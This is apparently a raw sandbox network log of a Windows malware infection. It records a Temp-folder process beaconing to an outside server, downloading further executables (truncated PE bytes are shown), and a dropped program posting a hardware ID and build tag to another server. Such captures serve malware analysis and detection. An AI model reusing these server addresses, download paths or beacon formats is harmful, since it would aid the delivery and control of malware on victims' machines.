Nov 11, 2024 10:34:07.699884892 CET	1236	IN	Data Raw: 61 90 93 84 db ff 64 e6 fa a7 06 ae e7 01 65 e6 fa 01 2b 4d 49 7a 93 84 df ff 64 e6 fa 3d 55 e6 0a 76 10 c2 d6 3c 55 e6 02 76 99 9c e0 68 86 d1 9c ba 34 fa d6 f9 4c e6 d6 85 94 c1 d9 76 10 7c d6 75 10 c2 aa 58 08 95 f8 50 9c 06 fb 96 99 06 fb 82 Data Ascii: ade+MIzd=Uv<Uvh4Lv\|uXP#N8 JckvdKL8/vxc4vK(M5vT\c5vK#(O[lvgRgllUa4lzA7 ZlU
Nov 11, 2024 10:34:07.700645924 CET	1236	IN	Data Raw: 1e ff 54 e6 e6 01 45 e6 bf 18 08 c2 d6 3d 55 e6 e6 76 10 c2 d6 f9 fa c3 61 aa 34 d1 58 04 08 c2 d6 ff 64 e6 e6 5f 96 b9 d6 75 9e 46 fb 14 11 c2 d6 f9 0a c7 48 e3 99 8c 60 92 34 4b ca 06 a1 52 67 06 a1 52 67 ff 64 e6 ee ff d2 4b c7 37 f9 da 59 56 Data Ascii: TE=Uva4Xd_uFH`4KRgRgdK7YV M#zJR_f,^MfdExSa4_TKOvUQk6`J=M8G3>]5EHw_44v
Nov 11, 2024 10:34:07.700658083 CET	1236	IN	Data Raw: 1b aa 6a 45 9d 74 94 bb 3b e9 e6 4d 2b 9a 38 ad 47 ff e3 47 a9 01 65 e6 fe ea 76 4d 23 9a 14 ad 05 ff 5c e6 da ff e1 4b af 30 de 8e a3 42 08 a5 98 60 14 4f db 88 9d c6 56 9f d3 42 a2 a6 98 1e 0b d1 5e 4b aa ff da 4d 23 9a 14 47 b2 ea 46 b8 1b 9a Data Ascii: jEt;M+8GGevM#\K0B`OVB^KM#GFKAK#9 x(Jk GRgRgRg]UT)vfRgRgRg@dzDEIu~P6KU x(Jk .vKM#KvM# Ev
Nov 11, 2024 10:34:07.701383114 CET	1236	IN	Data Raw: a5 9f e6 4d 33 9a 20 fb b4 ec 17 4f e3 90 99 0e fb 96 49 8a 4a 99 9b 16 fb 7a a0 52 67 01 5d e6 ea 85 c6 ce d7 fe 1a 04 17 01 5d e6 f6 af d8 34 c3 ff 64 e6 da 01 65 e6 0a 03 95 e6 72 76 10 c2 61 ea 34 ce ff 3c 9a b2 dc 76 10 c2 d9 9f db c3 a9 ff Data Ascii: M3 OIJzRg]]4derva4<vl_gv6z`z4v-vIEvMKEy<dw@MXwEy$dKx@M2w4J6zCOJzF6z_h'
Nov 11, 2024 10:34:07.701395035 CET	1236	IN	Data Raw: d6 76 11 35 dd 01 85 e6 e6 61 6d 4b c8 37 fa da 5f 39 d2 ad e1 30 13 c2 d6 76 39 9c 5a 6e 12 7a d7 76 10 c2 ea 77 07 89 d7 7e 10 c2 4b 83 1f 78 60 73 90 06 d7 fe 5c d6 02 61 35 d1 8c ff 13 42 1b 76 98 0e eb a2 99 b3 58 57 11 da d6 76 91 bb d7 7e Data Ascii: v5amK7_90v9Znzvw~Kx`s\a5BvXWv~Kx<UPMK J<O[vz9`4?6IVx4U6wwNKPKK,a47MK,7lK~vAKA`44M+(ZlU
Nov 11, 2024 10:34:07.703767061 CET	1120	IN	Data Raw: 67 06 a1 52 67 ff e1 4b cf f9 09 c7 e5 02 94 c2 d6 76 9d 1b d3 ff ef 83 c6 78 57 45 be 7d 84 d9 97 5d 13 f3 a8 3d 15 d2 06 a6 40 f2 59 38 15 fb ad eb 02 c4 a6 9f e1 4b a6 f9 0b df 48 cd a0 52 67 06 a1 52 67 3d 11 f2 06 a6 40 89 17 7a 40 f2 06 a6 Data Ascii: gRgKvxWE}]=@Y8KHRgRg=@z@@=Q@ @@@=Q@Y61O&V`E{gRgRg6lKRgRgRgRg(AKK6z,&fJvB8W8a_PO(uZo7#$u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	50123	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:10.958761930 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 35 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005502001&unit=246122658369
Nov 11, 2024 10:34:11.600004911 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	50125	185.215.113.16	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:11.607227087 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 11, 2024 10:34:12.243428946 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:12 GMT Content-Type: application/octet-stream Content-Length: 1845248 Last-Modified: Mon, 11 Nov 2024 09:18:03 GMT Connection: keep-alive ETag: "6731cbcb-1c2800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 d0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 6b 00 00 04 00 00 7f 5e [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"j@k^@M$a$ $b@.rsrc $r@.idata $r@ p+$t@olxddulo0Pv@pxsrqflzj@.taggant0j"@
Nov 11, 2024 10:34:12.243447065 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:12.243459940 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:12.243465900 CET	336	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:12.243473053 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:12.243478060 CET	1236	IN	Data Raw: cd 1d e5 21 e2 aa ad f7 c4 a6 ca fb 76 ca f0 b3 88 07 f5 65 ad 36 a5 77 ea 3a 57 9c 20 e2 86 bc 2f fe d7 81 2f cc ba 5f ea df 04 a4 27 92 97 96 71 1d 17 f5 07 49 e2 17 79 a5 bb 8f 21 ce 96 10 09 d7 91 df 99 d4 b3 22 b8 58 4d ac c4 b7 c9 88 bb db Data Ascii: !ve6w:W //_'qIy!"XM\cl\zwv5v]Z+jhO!{.c\H(FR-$s\|~K82KV5ZFq^ZX9qI@(b
Nov 11, 2024 10:34:12.243484974 CET	1236	IN	Data Raw: 4a 10 b0 e1 59 d8 6c fb d2 27 3d 70 89 2f dc 9e 43 4e 64 a8 fb 6b 95 b8 e7 0b 74 f1 0d 16 6d 30 e5 fb 2e 37 7f 53 bb 61 69 ce 27 be f8 a0 4e 5f 43 a2 68 30 b2 b9 90 22 bd 3b 84 9e 16 6a 7f 2f 76 97 ce b8 9c 33 ed 29 60 46 91 da 28 81 dc 73 b3 84 Data Ascii: JYl'=p/CNdktm0.7Sai'N_Ch0";j/v3)`F(s)yLVH;r>0iE1+E\Iz(+VYuF3Wu}!!;HgrM4G(G;-x0={8UxWTKbf!
Nov 11, 2024 10:34:12.243489981 CET	336	IN	Data Raw: be 01 cb b8 cc da 4c c4 30 3e cd 1b cb 92 0b 06 57 e2 cd a5 bc 56 a2 b8 50 da 1c f3 c9 5b 9d 9d 74 06 9f 5f 53 37 8d c6 27 17 10 b9 78 d6 68 22 bd 21 9d 00 d5 4e 79 dc a0 e8 d8 a8 fb ce 8f 07 11 b5 9c 9f 8c 0a c9 24 f3 03 9f db b8 e8 a0 aa 72 54 Data Ascii: L0>WVP[t_S7'xh"!Ny$rT~M\|\w!8i$4+30[Ti=adN9#JYBq<F^s+n\|GO\|iQ
Nov 11, 2024 10:34:12.243496895 CET	1236	IN	Data Raw: bf 43 0d ba 38 51 cb b0 f0 87 b1 8f bf e8 90 b5 f8 12 b5 9a 2c 56 05 ba c0 e4 d8 bf be 8e 0d c1 95 df 0f 2c e1 dc a9 db b0 d6 12 28 80 58 93 af f8 dc c3 d9 d0 ea e0 bd 69 df 75 e9 28 08 a2 2f b9 ce 16 21 51 db d2 00 59 dc 98 5f 33 9e ce a7 3a 5f Data Ascii: C8Q,V,(Xiu(/!QY_3:_w4"ySN!l`,NDq9:pJo~f!gXCq\|)\V$`zgR,(g#NvA
Nov 11, 2024 10:34:12.243586063 CET	1236	IN	Data Raw: 89 19 99 1e d1 16 9a dc 0c 57 65 23 bc 90 99 bf 4b 3e 2a b1 34 ce 34 1c ee 77 ad f8 48 67 9f 47 b1 9a 0d da 43 06 81 58 4a dc 60 a0 fc 0a 16 1d 4d 21 cb 87 ba ca b5 a8 40 52 b2 06 eb ce a0 c4 3c ee 9e bf 44 f2 ca f0 cc ca c2 b7 be 08 c9 a8 94 4e Data Ascii: We#K>*44wHgGCXJ`M!@R<DN=]=J9VH,",v_-mzJddJxQynLROXhKP%Je
Nov 11, 2024 10:34:12.248420954 CET	1236	IN	Data Raw: 4c eb d0 16 e4 0e 9f ab c0 f2 fc 3b bf 08 49 b9 78 da 5c f3 ca 3e 51 49 89 0a 79 ba 60 4a 9f f9 cd e2 c2 a8 e4 00 95 5b 41 0a 13 e4 f4 cd 2b 3a c1 4a a2 bb da 4e ae ca 0a 7c b9 1b bf 06 aa 7f 32 d8 a5 a9 fc ed 98 d3 38 dc 99 0f 34 ef 8f c3 e0 88 Data Ascii: L;Ix\>QIy`J[A+:JN\|284J8Ss&GJ@f\br}i_)Uxo>*w/<Zy4(c4R/ZU>D"4Vx=lf'9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	50129	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:15.528429985 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 35 30 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005503001&unit=246122658369
Nov 11, 2024 10:34:16.169377089 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	50130	185.215.113.206	80	8408	C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:15.556123018 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 10:34:16.193809032 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:34:16.211165905 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="build"mars------HIDAKFIJJKJJJKEBKJEH--
Nov 11, 2024 10:34:16.413104057 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	50132	185.215.113.16	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:16.352967024 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Mon, 11 Nov 2024 09:18:03 GMT If-None-Match: "6731cbcb-1c2800"
Nov 11, 2024 10:34:16.996123075 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:16 GMT Last-Modified: Mon, 11 Nov 2024 09:18:03 GMT Connection: keep-alive ETag: "6731cbcb-1c2800"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	50144	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:21.790947914 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 35 30 34 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005504031&unit=246122658369
Nov 11, 2024 10:34:22.433559895 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	50145	185.215.113.16	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:22.444473982 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 11, 2024 10:34:23.086316109 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:22 GMT Content-Type: application/octet-stream Content-Length: 2805248 Last-Modified: Mon, 11 Nov 2024 09:05:32 GMT Connection: keep-alive ETag: "6731c8dc-2ace00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 c2 b6 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$@+ `@ ++`Ui` @ @.rsrc`2@.idata 8@oulglswrn:@yzfglius +@.taggant@@+"@
Nov 11, 2024 10:34:23.086338997 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:23.086427927 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:23.086440086 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:23.086587906 CET	424	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:23.086601019 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:23.086611986 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:23.086626053 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:23.086635113 CET	136	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:23.086652994 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:23.091624022 CET	1236	IN	Data Raw: 50 9f f8 93 f5 3e 18 0e 37 1c 6a 95 65 0d 41 bd 02 3e 05 2e 97 e9 32 0d 37 1c 6a 23 68 11 41 0d 26 3e f7 8f 47 4d c1 05 55 d1 dd 76 86 e4 5e ef 64 15 9c 0c c7 3e c7 05 59 2b e5 3d 9f 10 a8 40 3e 77 ea 8e 05 e8 6a b5 45 f3 f8 b8 28 17 be 09 d8 39 Data Ascii: P>7jeA>.27j#hA&>GMUv^d>Y+=@>wjE(9 ~1h0L d$?s#\|T(;0k>Vcd;\|:NaJHK-"^ulz,rQ;[\|L?O;TA,?;{E6I9p/<2}d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	50148	185.215.113.206	80	9056	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:22.736921072 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 10:34:23.374685049 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:34:23.415333986 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJD Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 2d 2d 0d 0a Data Ascii: ------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="build"mars------JDGHIIJKEBGIDHIDBKJD--
Nov 11, 2024 10:34:23.617783070 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	50151	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:26.354444981 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 35 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005505001&unit=246122658369
Nov 11, 2024 10:34:27.009598017 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	50154	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:28.646712065 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 11, 2024 10:34:29.283471107 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	50156	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
